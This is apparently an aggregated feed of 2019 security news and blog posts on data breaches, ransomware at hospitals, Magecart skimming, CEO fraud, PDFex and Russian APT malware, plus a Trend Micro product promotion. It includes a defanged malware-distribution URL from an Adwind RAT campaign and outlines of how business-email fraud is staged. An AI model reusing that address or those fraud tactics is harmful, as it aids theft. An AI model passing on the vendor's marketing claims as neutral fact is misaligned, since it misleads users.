One of the more recent breaches collected, packaged and sold about 26 Million new accounts on the Dark Web by hacking several websites, including online shopping, career and learning platforms. A longer list of breaches—see The 18 Biggest Data Breaches of the 21st Century, as well as Wikipedia’s List of Data Breaches—reveals how chronic it’s become. Because our personal data is often stored on internet sites, many of which are crucial to our way of life, we forget that simply registering and providing personal details can lead to more precise and accurate description of our location, our healthcare information, and even information indicated on our government issued IDs. And its sale on the Dark Web is a very bad outcome.

The Dark Web (or Darknet) refers to that part of the internet that hides your identity and location when you’re on it. Dark Web websites are accessible only through Tor (the “Onion Routing” browser) and through I2P (the Invisible Internet Project”). Historically, one of the reasons for the creation of the Dark Web was to provide US Navy intelligence officers a means to maneuver on the internet without being recognized or traced. The Tor network achieves anonymity by bouncing the request through a large number of intermediate servers and employing a layered encryption system on the identification of the source IP where the search originated, so that no one knows where the request for a webpage or site ultimately comes from. I2P specializes in allowing the anonymous hosting of websites, so the target IP address is unknown to the searcher.

In short, browsing the Dark Web allows you to anonymously access “anonymized” websites, not all of which are bad, but also many sites that are, collectively known as Darknet markets. The former category includes SecureDrop, which lets news organizations receive anonymous submissions.  The latter category included Silkroad 1.0, which was launched in February of 2011; and 2.0, which was finally shut down in November of 2014 by the FBI. The Dark Web or Darknet is still a channel for all kinds of illegal activities, including a place for radical extremists to spread propaganda—and remains a region on the internet for the sale of illegally gotten identity data.

Protecting Your Identity

Although data protection laws state that any personal data set that’s stored online has to be stripped of identifiers such as name and social security, true compliance is difficult to maintain or enforce—so each one of us has the ultimate responsibility to protect our data to stay safe online. Here are some practical steps you can take to help protect your identity:

Accounts and Usernames: Think carefully when choosing your username for your online accounts and email addresses. Choose something that does not closely identify with your full name or other personal information.

Passwords: If you use several internet services, social media accounts, and email addresses, you’ll need a lot of passwords. Tempting as it is, avoid using the same password for all your accounts. Use a unique password for each account, one that you can remember, but that’s not easy to guess. We highly recommend using Trend Micro Password Manager to generate strong passwords, to keep them safe, and to change them frequently. Banking apps and other payment system apps also utilize two-factor authentication, which you should take advantage of for more secure transactions and purchases.

Privacy: Keep your personal information private online and enable strong privacy controls on your social media accounts.

Protect your devices: Don’t leave your mobile devices and laptops unattended and enable PIN and password to unlock them.

Remediation: If you hear of a major online data breach, sit up and take notice: you might need to take active steps to remediate the situation. As with the Equifax Data Breach of 2017, where sensitive data on 143 Million Americans was exposed, remediation may mean locking or freezing your credit on each of the credit bureaus: Equifax, Experian, and TransUnion. With other types of breaches, it may simply mean closing an account or canceling a credit card. As with the credit bureaus, many banks have identity protection services which you can also avail yourself of.

Trend Micro ID Safe

Apart from the best practices outlined above, you should also install Trend Micro ID Safe for Android and iOS on your mobile devices, to monitor and help remediate any known security issues with your identity data.

What is ID Safe? ID Safe checks if any of your personal information stolen from data breaches is circulating on the Dark Web for sale or distribution by cybercriminals. It identifies which accounts were breached and the kind of data posted, then notifies you, so you can take steps to change your account credentials or remediate any potential effects of the illegal distribution or sale of your personal data.

Top-notch Security. To ensure the highest level of security when handling your personal information, ID Safe first hashes the data you enter on the app (essentially converting the text to an irreversible number) using the SHA-256 hashing standard—the world’s most secure— before sending it through an encrypted connection to check it against a comprehensive Dark Web database.

Easy to Use Tools. You can quickly check if your personal data has reached the Dark Web with just a few taps, using its various tools:

  • Email Checker. See if the email address you use for online accounts has appeared on the Dark Web due to a data breach. If it finds your address, the app shows exactly which accounts suffered the breach, so you immediately know which passwords to change.
  • Credit Card Checker. Find out if someone has stolen your credit card number and put it on the Dark Web.
  • Password Checker. You should not only use unique passwords for all of your accounts, but also choose passwords that nobody else has ever used. ID Safe can see if you have used a password currently in circulation on the Dark Web.
  • Dark Web Personal Data Monitor. ID Safe can scour the Dark Web for sensitive personal information like your bank account numbers, driver’s license data, social security number, and passport details, then immediately alert you if they ever appear there.

GDPR Compliant. Finally, you should know that Trend Micro takes your privacy seriously and complies with the European Union’s General Data Protection Regulations (GDPR) to protect your data. Read ID Safe’s data collection notice here:

https://esupport.trendmicro.com/en-us/home/pages/technical-support/1121937.aspx

For more information and to download ID Safe, go to Trend Micro ID Safe on the iOS App Store and Trend Micro ID Safe on Google Play.

The post In Identity Theft the Target is You! appeared first on .

Cyber Security Roundup for September 2019

Anyone over the age of 40 in the UK will remember patiently browsing for holidays bargains on their TV via Teletext. While the TV version of Teletext Holidays died out years ago due to the creation of the world-wide-web, Teletext Holidays, a trading name of Truly Travel, continued as an online and telephone travel agent business. Verdict Media discovered an unsecured Amazon Web Services Service (Cloud Server) used by Teletext Holidays and was able to access 212,000 call centre audio recordings with their UK customers. The audio recordings were taken between 10th April and 10th August 2016 and were found in a data repository called 'speechanalytics'. Businesses neglecting to properly secure their cloud services is an evermore common culprit behind mass data breaches of late. Utilising cloud-based IT systems does not absolve businesses of their IT security responsibilities at their cloud service provider. 

Booking Holidays on Ceefax in the 1980s

Within the Teletext Holidays call recordings, customers can be heard arranging holiday bookings, providing call-centre agents partial payment card details, their full names and dates of birth of accompanying passengers. In some call recordings, Verdict Media advised customers private conversations were recorded while they were put on hold. Teletext Holidays said they have reported the data breach to the ICO.

Separately, another poorly secured cloud server was discovered with thousands of CVs originating from the Monster.com job-hunting website.  Monster.com reported the compromise of CVs was between 2014 and 2017 and was due to a 'third-party' it no longer worked with.

Wikipedia was the subject to a major DDoS attack, which impacted the availability of the online encyclopaedia website in the UK and parts of Europe. While the culprit(s) behind the DDoS attack remains unknown, Wikipedia was quick to condemn it, it said was not just about taking Wikipedia offline, "Takedown attacks threaten everyone’s fundamental rights to freely access and share information. We in the Wikimedia movement and Foundation are committed to protecting these rights for everyone."

CEO Fraud
The BBC News website published an article highlighting the all too common issue of CEO Fraud, namely company email spoofing and fraud which is costing business billions.  

Criminals are increasingly targeting UK business executives and finance staff with ‘CEO Fraud’, commonly referred to as ‘whaling’ or Business Email Compromise (BEC) by cybersecurity professionals. CEO fraud involves the impersonation of a senior company executive or a supplier, to social engineer fraudulent payments. CEO fraud phishing emails are difficult for cybersecurity defence technologies to prevent, as such emails are specifically crafted (i.e. spear phishing) for individual recipients, do not contain malware-infected attachments or malicious weblinks for cyber defences to detect and block.

Criminals do their research, gaining a thorough understanding of business executives, clients, suppliers, and even staff role and responsibilities through websites and social media sites such as LinkedIn, Facebook, and Twitter.  Once they determine who they need to target for maximum likelihood of a financial reward return, they customise a social engineering communication to an individual, typically through email, but sometimes through text messages (i.e. smishing), or over the phone, and even by postal letters to support their scam. They often create a tremendous sense of urgency, demanding an immediate action to complete a payment, impersonating someone in the business with high authority, such as the MD or CEO. The criminal’s ultimate goal is to pressurise and rush their targetted staff member into authorising and making a payment transaction to them. Such attacks are relatively simple to arrange, require little effort, and can have high financial rewards for criminals. Such attacks require little technical expertise, as email spoofing tools and instructions are freely available on the open and dark web. And thanks to the internet, fraudsters globally can effortless target UK businesses with CEO fraud scams.

UK Universities are being targetted by Iranian hackers in an attempt to steal secrets, according to the UK National Cyber Security Centre and the UK Foreign Office. The warning came after the US deputy attorney general Rod Rosenstein said: “Iranian nationals allegedly stole more than 31 terabytes of documents and data from more than 140 American universities, 30 American companies, five American government agencies, and also more than 176 universities in 21 foreign countries."

Security Updates
'Patch Tuesday' saw Microsoft release security updates for 78 security vulnerabilities, including 17 which are 'Critical' rated in Windows RDP, Azure DevOps, SharePoint and Chakra Core.  

On 23rd September 2019, Microsoft released an ‘emergency update’ (Out-of-Band) for Internet Explorer (versions 9, 10 & 11), which addresses a serious vulnerability (CVE-2019-1367) discovered by a Google researcher and is said to be known to be actively exploited.  The flaw allows an attacker to execute arbitrary code on a victim's computer through a specially crafted website, enabling an attacker to gain the same user rights as the user and to infect the computer with malware. It is a particularly dangerous exploit if the user has local administrator rights, in such instances an attacker gain full control over a user's computer remotely. This vulnerability is rated as 'Critical' by Microsoft and has a CVSS score of 7.6. Microsoft recommends that customers apply Critical updates immediately.

Ransomware
Research by AT&T Cybersecurity found 58% of IT security professionals would refuse to pay following a ransomware attack, while 31% said they would only pay as a last resort. A further 11% stated paying was, in their opinion, the easiest way to get their data back. While 40% of IT Security Pros Would Outlaw Ransomware Payments. It is clear from the latest threat intelligence reports, that the paying of ransomware ransoms is fuelling further ransomware attacks, including targetted attacks UK businesses.

BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
HUAWEI NEWS AND THREAT INTELLIGENCEAWARENESS, EDUCATION AND THREAT INTELLIGENCE

#VB2019: Magecart Attack Groups Move to More Targeted Efforts

#VB2019: Magecart Attack Groups Move to More Targeted Efforts

Speaking at the Virus Bulletin 2019 conference in London, Yonathan Klijnsman, head of threat research at RiskIQ, said that many groups had been identified as being behind recent Magecart attacks, but new movements were being made towards more targeted attacks.

Klijnsman explained that traditional Magecart attacks groups would get into a company’s network, and they would typically target e-commerce organizations, with only “25 lines of javascript.” He said that the web skimmers worked on the server side, and in 2016 RiskIQ observed more groups starting to do this, “and there are 15 active groups that we tracked.”

Pointing to Group 6 that IBM’s X-Force published a report on, Klijnsman said that “once they are in your network they will know more than you do, they are the admins you want to hire.” The group later hit both NewEgg and British Airways, having access to the former for six months, but crucially not being present during Black Friday, as they had been detected and removed by then.

Another called Group 5 are “experts in support,” and Klijnsman said that they know of at least 20 suppliers that have been hit by this group. “They hit one supplier who had over 100,000 victim websites” and while it delivers malicious code, it will not have access to payment data.

A group that RiskIQ plans to reveal more details on in the coming months is Group 15, who Klijnsman said are “very specialized” as they have built a framework for skimming, and are able to remove a payment form and put their own in it's place.

This, he said, was part of the evolution of the groups, as they are doing more targeting and learning more about content management systems. In the case of the attack on Ticketmaster, this was enabled by a compromise of Sociaplus between December 2017 to June 2018.

This was part of one of the three main compromise capabilities: via outdated or misconfigured systems, via password reuse as groups are looking at breached user lists and supply chain attack.

“The latter is not something people are talking about and while you want analytics and CDNs and services, they make you vulnerable and make your customers and visitors vulnerable to attack.”

PDFex attacks can exfiltrate content from encrypted PDF documents

Researchers from Ruhr University Bochum and Münster University of Applied Sciences have devised new attacks allowing them (and potential attackers) to recover the plaintext content of encrypted PDF documents. The attacks work against 27 widely-used desktop and browser-integrated PDF viewers. The attacks The PDFex attacks (as the researchers collectively dubbed them) can either result in direct exfiltration or exfiltration via CBC gadgets. Direct exfiltration attacks abuse the fact that some PDF readers don’t encrypt the … More

The post PDFex attacks can exfiltrate content from encrypted PDF documents appeared first on Help Net Security.

New Research into Russian Malware

There's some interesting new research about Russian APT malware:

The Russian government has fostered competition among the three agencies, which operate independently from one another, and compete for funds. This, in turn, has resulted in each group developing and hoarding its tools, rather than sharing toolkits with their counterparts, a common sight among Chinese and North Korean state-sponsored hackers.

"Every actor or organization under the Russain APT umbrella has its own dedicated malware development teams, working for years in parallel on similar malware toolkits and frameworks," researchers said.

"While each actor does reuse its code in different operations and between different malware families, there is no single tool, library or framework that is shared between different actors."

Researchers say these findings suggest that Russia's cyber-espionage apparatus is investing a lot of effort into its operational security.

"By avoiding different organizations re-using the same tools on a wide range of targets, they overcome the risk that one compromised operation will expose other active operations," researchers said.

This is no different from the US. The NSA malware released by the Shadow Brokers looked nothing like the CIA "Vault 7" malware released by WikiLeaks.

The work was done by Check Point and Intezer Labs. They have a website with an interactive map.

#VB2019: NCSC Reflects on Three Years of Countering and Attribution

#VB2019: NCSC Reflects on Three Years of Countering and Attribution

As it prepares to mark its third anniversary of opening, the National Cyber Security Centre (NCSC) has said that defending the UK is a team effort and encouraged more businesses to work with it.

Speaking at the Virus Bulletin 2019 conference in London, director of operations at the NCSC Paul Chichester, reflected on the work done to create the NCSC, and how UK businesses needed to work alongside it.

Chichester explained that the momentum for a response center had begun when, in the 2000s, the attackers targeting the UK were looked at closer, and today “there are 20 nation state threats that we track” and while it does not track all threats and compete with commercial companies, it can “understand additional insights.” 

He said that with 20 years of capability and insight to understand threats to the UK, the government funding in 2010 led to the development of the NCSC, which solved the problem of the “obvious flaws in the approach that the UK took,” in particular that there was no single point or place to go to report issues. 

Admitting that the work of the NCSC will not stop the UK being an interest for attackers, Chichester pointed out that it is able to counter threats. “Our work in the past has been on observing threats, and our view is that it is not about counting but countering the threat,” he added. 

He also said that as the NCSC is responsible for attribution, the UK government understands the context of threats and can assess threat as it pertains to the UK. “Also, we don’t respond with a red button, but by helping people, reporting to the victim and doing victim notification,” he continued, that the NCSC does “a huge amount of work in the UK and works with organizations to help them recover. Attribution is an art, not a science,” he said.

He concluded his talk by saying that the NCSC wants to collaborate more, and work with people in the industry “and for us it is a team sport and please talk to us - we care about the things you care about.”

Later speaking to Infosecurity, Chichester said that the efforts undertaken by the NCSC include doing formal attribution, and protecting the anonymity of the organizations it protects. As part of this, it feeds tactical intelligence via its CISP and partner channels, and he said that companies are often not judged by the compromise, “but how they deal with it.”

Asked if businesses are coming to the NCSC to collaborate, Chichester said they are “massively” and this is fundamental for the business. “We want people to come to us to get insight into threats at a macro level, and we want to work with organizations to help us understand what they are seeing and doing [regarding] incident response.”

Cyber Security Today – October cyber security awareness month, ransomware statistics and lots of security updates to watch out for

October cyber security awareness month, ransomware statistics and lots of security updates to watch out for. Welcome to Cyber Security Today. It’s Wednesday October 2nd, I’m Howard Solomon, contributing reporter on cyber security for ITWorldCanada.com.     October is cyber security awareness month. I assume listeners to this podcast worry about cyber security. Good. But…

A Look Into Continuous Efforts By Chinese Hackers to Target Foreign Governments

Phishing is still one of the widely used strategies by cybercriminals and espionage groups to gain an initial foothold on the targeted systems. Though hacking someone with phishing attacks was easy a decade ago, the evolution of threat detection technologies and cyber awareness among people has slowed down the success of phishing and social engineering attacks over the years. Since phishing

Asics apologizes after pornography ran on screens at central store in Auckland for hours

NZ Sports Store Apologises Over Porn Played on Big Screens

Hackers broadcasted pornography content on large television screens located above the Asics central store in Auckland for several hours.

The New Zealand branch of sports brand Asics apologized for an embarrassing incident that took place over the weekend. On Sunday, hackers broadcasted pornography content on large television screens above the Asics central Auckland store for several hours.

The Pornography ran on the Asics’s outdoor screens for at least nine hours, it was noticed by the staff at the shop around 10am on Sunday, when the store opened to the public.

Security officer Dwayne Hinango confirmed that the video played for almost two hours, but some witnesses said it had been running since 1am.

“An Asics store manager has apologised and says a full investigation is under way after pornography appeared on large TV screens above its Auckland central shop.” reported the New Zealand Herald.

“The store manager, who gave his name only as John, said the incident happened because of a cybersecurity breach – he was “100 per cent sure” the explicit videos had not been uploaded by one of his staff.”

Some people walking near the Asics store were shocked, including a mother that was with her seven-year-old son that defined the explicit content as “totally inappropriate and offensive.”

According to a post published by Asics New Zealand on Facebook, an attacker gained unauthorized access to its internal televisions.

“We would like to apologise to anyone who may have seen this.” states the post.

Asics confirmed that it was working with the help of online security suppliers to ensure secure its system and avoid similar incidents in the future.

Pierluigi Paganini

(SecurityAffairs – vBulletin, data breach)

The post Asics apologizes after pornography ran on screens at central store in Auckland for hours appeared first on Security Affairs.

Attackers Targeting U.S. Petroleum Companies with Adwind RAT

Digital criminals have launched a new attack campaign that they’re using to target U.S. petroleum companies with the Adwind RAT. Netskope discovered the operation in the beginning of September and found that it was distributing the Adwind RAT from “members[.]westnet[.]com[.]au/~joeven/.” With this URL in mind, it’s likely that the individual responsible for the campaign either […]… Read More

The post Attackers Targeting U.S. Petroleum Companies with Adwind RAT appeared first on The State of Security.

Two-Thirds of Firms Have Suffered ERP Data Breaches

Two-Thirds of Firms Have Suffered ERP Data Breaches

Nearly two-thirds of businesses which rely on SAP or Oracle have suffered a breach of their ERP systems in the past two years, according to new research from Onapsis.

The security vendor commissioned IDC to poll 430 IT decision makers knowledgeable about their organization's ERP applications.

Of the 64% that have suffered a breach of SAP or Oracle E-Business Suite (EBS), sales data (50%) was most commonly compromised, followed by HR data (45%), personal customer information (41%), intellectual property (36%) and financial data (34%).

The range of sensitive information listed above highlights the crucial role security teams have in protecting ERP applications, especially considering that, on average, three-quarters (74%) of these ERP applications were internet connected.

“ERP applications can be foundational for businesses. A breach of such critical ERP applications can lead to unexpected downtime, increased compliance risk, diminished brand confidence and project delays,” said Frank Dickson, program vice-president, cybersecurity products with IDC.

“Cyber-miscreants seem to be indiscriminate when it comes to ERP systems, having an appetite for all types of data, which, if in the wrong hands, could be detrimental to the business in terms of revenue and reputation.”

The high volume of breaches is also somewhat at odds with another finding: that 78% of respondents audit their ERP apps every 90 days or more.

Larry Harrington, former chairman of the Global Board of the Institute of Internal Auditors (IIA), said the findings should raise questions at a board level about the quality of such audits.

“The lack of these controls is one way for cyber insurance companies to deny claims,” he warned “The information compromised most often according to this research is the highest regulated in today’s business ecosystem. Most concerning is the popularity of sales, financial data and PII, all of which should raise flags about the possibility of insider trading, collusion and fraud.”

Urgent11 flaws affect more medical, industrial devices than previously thought

When, in late July, Armis researchers revealed the existence of the so-called Urgent11 vulnerabilities in Wind River’s VxWorks real-time operating system, they noted that RTOS offerings by other vendors may also be vulnerable. As it turns out, they were right – they are also present is some versions of these Real Time Operating Systems: OSE by ENEA INTEGRITY by Green Hills Nucleus RTOS by Mentor ITRON by TRON Forum ZebOS by IP Infusion. (The researchers … More

The post Urgent11 flaws affect more medical, industrial devices than previously thought appeared first on Help Net Security.

WEF: Cyber-Attacks Are Biggest Business Risk in Europe and US

WEF: Cyber-Attacks Are Biggest Business Risk in Europe and US

Cyber-attacks remained the biggest perceived risk of doing business for executives in North America and Europe, and second globally, according to an annual World Economic Forum (WEF) report published yesterday.

Compiled from the responses of over 12,900 executives in 133 countries, the Regional Risks for Doing Business 2019 report outlines “the five global risks that you believe to be of most concern for doing business in your country within the next 10 years.”

Cyber-attacks were pegged as the biggest risk by CEOs in six of the world’s 10 largest economies: the US, Germany, the UK, France, Italy and Canada, as well as Italy and six other European countries.

Data fraud or theft was put in seventh place in terms of most concerning business risks for global respondents.

“The fact that cyber-threats worry the business community as much as they do academia, civil society, governments and other thought leaders shows just how disruptive this risk is to all aspects of life,” the report noted.

“As economies and societies continue to digitize, cyber-attacks are both more lucrative for attackers and more dangerous for victims.”

The WEF report highlighted the emergence of “formjacking” or Magecart attacks, alongside cryptojacking and the persistent threat of ransomware including the major losses suffered by Norsk Hydro as contributing to CEO unease over cyber-threats.

Some 61% of European businesses reported cyber-incidents in 2019 compared to 45% the previous year, according to insurer Hiscox.

In the US, the report pointed to a spate of ransomware attacks on local government authorities across the country and concerns over the security of election systems.

“Cybersecurity remains the most concerning risk to business leaders in advanced economies, and growing technology dependence for many businesses will only amplify this,” argued John Drzik, president of global risk and digital at Marsh.

“Combined with fractious geopolitical developments, and growing economic concerns, executives face a very challenging portfolio of potential threats. Business leaders should re-evaluate their underlying view of the global risk environment and make greater efforts to strengthen their corporate agility and resilience.”

How SMBs Can Mitigate the Growing Risk of File-based Attacks

Cases of document-based malware are steadily rising. 59 percent of all malicious files detected in the first quarter of 2019 were contained in documents. Due to how work is done in today's offices and workplaces, companies are among those commonly affected by file-based attacks. Since small to medium businesses (SMBs) usually lack the kind of security that protects their larger counterparts,

Former Yahoo Employee Pleads Guilty to Hacking Accounts

Former Yahoo Employee Pleads Guilty to Hacking Accounts

A former Yahoo employee has pleaded guilty to hacking thousands of customer accounts in search of sexual images and videos.

Reyes Daniel Ruiz, 34, of Tracy, California, admitted in a San Jose federal court on Monday to hacking around 6000 accounts — targeting those belonging to young women, including friends and colleagues.

He is said to have copied the content to a hard drive at home, although Ruiz destroyed it after his employer raised the alarm about suspicious activity.

It’s unclear exactly how he actually compromised the accounts, but the Department of Justice claimed he was first able to “crack” user passwords to access internal Yahoo systems.

Once inside, he was then able to compromise other accounts, including iCloud, Facebook, Gmail and DropBox — presumably if password reset emails were sent to the hacked Yahoo accounts.

Ruiz was charged with one count of computer intrusion and one count of interception of a wire communication. Under a plea agreement he admitted to the first charge, which carries a maximum sentence of five years behind bars plus a fine of $250,000.

Carl Wearn, head of e-crime at Mimecast, argued that all organizations should have measures in place to mitigate the insider threat, and claimed the incident shows that password resets represent a serious business risk.

“We need to make it harder for hackers to trickle into a number of systems from one weak point. A starting point is to monitor systems for unusual behavior. A pattern of multiple employees resetting passwords, for example, should trigger a warning,” he added.

“Additionally, there should always be multiple administrators so that access privileges are not abused. Businesses may not be able to prevent every employee from using their skills or access for malicious means, but they can put a plan in place for spotting and tackling such behavior.”

Former Yahoo Employee Admits Hacking into 6000 Accounts for Sexual Content

An ex-Yahoo! employee has pleaded guilty to misusing his access at the company to hack into the accounts of nearly 6,000 Yahoo users in search of private and personal records, primarily sexually explicit images and videos. According to an press note released by the U.S. Justice Department, Reyes Daniel Ruiz, a 34-year-old resident of California and former Yahoo software engineer, admitted

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

“All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system.”

According to a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, had limited access to their computing systems.

“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”

Similar problems impacted at least seven hospitals in Australia. The information technology systems at a number of hospitals and health services in Gippsland and south-west Victoria have been impacted by a cyber security incident.

“A number of servers across the state have been impacted. Investigations are still taking place on the full extent of the impact.” reads the security advisory,

“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management. Hospitals have isolated and disconnected a number of systems such as internet to quarantine the infection.”

A couple of weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files. The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)


The post Ten hospitals in Alabama and Australia have been hit with ransomware attacks appeared first on Security Affairs.

Do You Need Cloud Computing and Content Delivery Networks (CDN)?

More than 20 years ago, Bill Gates asserted that “content is king.” Most probably, he couldn’t predict back then how much content the readers would consume on the internet today. He had no way of knowing the current challenges of web applications and content delivery to an ever-growing global base of users.

The primary challenges deal with performance and scalability issues. If you’re having the same problems, you can take advantage of cloud computing and content delivery network (CDN). Wait! Do you even know the difference between the two powerful tools? Which of them meet your requirements?

Content Delivery Network (CDN)

In simple words, a content delivery network is a collection of connected servers that distribute content.

How CDN Works

At least one server can be an “origin” while the others are cache servers situated in several countries around the world. The cache servers are in areas that geographically proximate to different end-users. The source media or content is in the origin server, which sends it to cache servers on an as-needed basis.

If a user requests content or resource, a specific CDN URL calls the content from a cache server nearest him. This way, he gets the information quickly with reduced latency. Moreover, the distribution of the load across different servers in various regions will reduce the stress on the primary server.

Use Cases for Content Delivery Network

This type of delivery network is suitable for static content like videos, images, and music. However, many content providers also use it for streaming media.

For instance, a company can deliver streaming video weekly to various users across the United States of America through a CDN. In the past, it would make use of a centralized server where users can connect to access the content. The consumers would have different experiences based on various factors such as their distance from the server.

Users who access the streaming video from different states may experience buffering and slow load times issues because of high latencies. Each of them may experience delivery issues because a central server may breach its user connection limits or other consumption issues.

CDNs deliver the streaming media to local servers and cause the reduced load of the origin server. Moreover, they ensure the maintenance of low latency.

Cloud Computing

Cloud computing reduces the delivery costs of content and applications through unused computer resources.

How Cloud Computing Works

Many computer systems remain ideal even though they serve more users. Through server virtualization, various virtual machines can access the resources of a single computer while delivering content and running applications.

Since the introduction of the cloud, the hypervisor technology has experienced considerable advancement and has developed to enable cluster management of hosts running various virtual machines. It manages virtualized servers that share resources even if the single host malfunctions. Virtual machines and cloud technologies add reliability and resiliency to hosted applications through abstraction of their functionality from physical hardware.

Cloud computing allows the deployment and sharing of virtual machine images in different regions. Moreover, it permits the delivery of applications quickly for lower latency and enhanced performance. Concisely, it acts as a content delivery network. As the number of users increases, it becomes viable for a new virtual machine to be up easier, cheaper, and faster than adding new hardware.

Cloud computing has different types and can range from custom-designed private clouds to hyper-scale public clouds. It can come with a high-powered bare-metal configuration. Famous public cloud providers include Azure and AWS.

Use Cases for Cloud Computing

The main functionality of cloud computing is to provide efficient resource management of networks and hosts to reduce delivery costs of content and applications. However, it also permits the simple deployment of server images to a host cluster or an individual computer. It is beneficial in enhancing the user experience through the placement of content or application in different regions. This way, it functions like a CDN in resource distribution.

The deployment of applications can also include disaster recovery strategies either by spinning up planned resources quickly or by relegating to a close standby environment. The technology makes it feasible to replicate an environment in another location across the globe.

For instance, a company can use a cloud-computing environment to reduce its hardware expenditures through shared resources across various virtual machines. This strategy is preferable instead of procuring one physical computer per application function. As the number of users expands per application, the organization can add more servers easily through spinning up virtual computes by using templates for the required functionality.

Combining Cloud Computing and CDN

In summary, a content delivery network offers a delivery platform for large amounts of content by using a server closest to the requisitioning user. On the other hand, cloud computing permits scaling of application resources efficiently.

Cloud computing is famous because it has high scalability and can process large amounts of data. In recent years, it becomes applicable to different fields. However, both CDN and cloud computing techniques have disadvantages. CDN has insufficient storage space and lacks IT infrastructure as the number of users grows. Cloud computing, on the other hand, has issues with a high concentration that causes network congestion. However, combining these two technologies becomes more beneficial through load balancing and high scalability that make it suitable for users with massive data requirements.

Combining the strategies for cloud computing and CDN builds a more reliable and resilient delivery strategy for content and applications than relying on just one of them. Deciding to use both systems can eliminate a singular failure point in application and content delivery through efficient and smart use of resources. CDNs reduce latency, and cloud computing offers more data storage. Each has its strengths and weaknesses, but together, they can combine their powers to be more useful to organizations and end-users.

Moreover, collaborating with a managed service provider that provides both functionalities can simplify relationships and leverage the combined expertise. An organization can take advantage of both CDN and cloud computing to provide fast and reliable content to its users all across the world.

The post Do You Need Cloud Computing and Content Delivery Networks (CDN)? appeared first on .

Experts found 20 Million tax records for Russian citizens exposed online

Experts discovered an unprotected Elasticsearch cluster containing personally identifiable and tax information of Russian citizens exposed online.

Security experts from Comparitech along with security researcher Bob Diachenko discovered 20 million tax records belonging to Russian citizens exposed online in clear text and without protection.

The experts found an unprotected Elasticsearch cluster that was containing personally identifiable information on Russian citizens spanning from 2009 to 2016.

“A database of more than 20 million Russian tax records was found on an unsecured server, accessible to anyone with a web browser.” reads the post published by Comparitech.

Comparitech partnered with security researcher Bob Diachenko to investigate the data exposure, which included sensitive personal and tax information. The database was taken offline after Diachenko notified the owner, who is based in Ukraine.”

Russian citizens

The Elasticsearch database was first indexed by search engines in May 2018, Diachenko discovered it on September 17, 2019, and on September 20, 2019 it was secured.

It is not possible to determine whether anyone else accessed the exposed data before it was discovered by Diachenko. The experts also revealed that the owner based in Ukraine, but did not reveal its identity.

The cluster included multiple databases, two of them contained tax and personally identifiable information about Russian citizens, prevalently from Moscow and the surrounding area.

“The first database contained more than 14 million personal and tax records from 2010 to 2016, and the second included over 6 million from 2009 to 2015.” continues the experts.

Exposed records included the following information:

  • Full name
  • Address
  • Residency status
  • Passport number
  • Phone number
  • Tax ID number
  • Employer name and phone number
  • Tax amount

The exposed data could be used by threat actors to carry out tax scam and frauds.

“Affected individuals could be at risk of identity theft and should monitor their accounts closely. Tax fraud could also be a risk, though our team is not well-versed enough on the topic of the Russian tax system to give concrete advice.” concludes the experts.

“Potential victims should also be on the lookout for targeted phishing and other scams. Fraudsters could pose as tax officials, for example, to steal money or request additional information to aid in identity theft.”

Pierluigi Paganini

(SecurityAffairs – Russian citizens, data leak)

The post Experts found 20 Million tax records for Russian citizens exposed online appeared first on Security Affairs.